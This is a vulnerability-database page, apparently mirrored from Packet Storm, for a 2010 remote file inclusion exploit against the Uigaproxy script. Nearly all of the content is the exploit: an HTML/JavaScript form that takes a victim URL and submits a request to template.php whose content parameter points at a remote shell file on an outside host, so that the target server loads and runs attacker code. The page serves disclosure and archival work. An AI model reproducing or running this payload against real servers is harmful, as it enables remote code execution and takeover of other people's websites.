Lucene search
K

Uigaproxy Remote File Inclusion

🗓️ 05 Apr 2010 00:00:00Reported by ItSecTeamType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 15 Views

Uigaproxy Remote File Inclusion vulnerability in template.php can be exploited to include remote files from a malicious server

Code
`<html>  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">  
<title>coded by ahmadbady</title>  
  
<script language="JavaScript">  
  
//===========================================================================  
//( #Topic : uigaproxy  
//( #Bug type : remote file include  
//( #Download : http://www.scriptdevelopers.net/download/uigaproxy.zip  
//( #Advisory :   
//===========================================================================  
//( #Author : ItSecTeam  
//( #Email : [email protected]  
//( #Website: http://www.itsecteam.com  
//( #Forum : http://forum.ITSecTeam.com  
  
//---------------------------------------------------------------------  
  
  
var path="/uigaproxy/include/"  
var file="template.php"  
var variable ="?content="  
var shell="http://ahmadbady.persiangig.com/other/a.txt?"  
  
function it(){  
xpl.action= document.xpl.victim.value+path+file+variable+shell;xpl.submit();  
}  
</script>  
  
</head>  
  
<body bgcolor="#FFFFFF">  
  
<p align="left"><font color="#0000FF"><b>uigaproxy remote file include</b></font></p>  
<form method="post" name="xpl" onSubmit="it();">  
<p align="left">  
<b><font face="Tahoma" size="2"><font color="#FF0000">example</font>:http://victim/path</a></font>  
or  
</font>  
<font face="Tahoma" size="2" color="#000000">http://victim</font><font   
size="2" face="Tahoma"></a> <font size="2">&nbsp;--></font></font></b><font   
size="2" face="Tahoma">  
<input type="text" name="victim" size="20";"></p>  
<center>  
  
</p>  
<p><input type="submit" value="GO" name="B1" style="float: left"><input type="reset"   
value="reset" name="B2" style="float: left"></p>  
</form>  
<p><br>  
&nbsp;</p>  
</center>  
</body>  
  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Apr 2010 00:00Current
0.1Low risk
Vulners AI Score0.1
15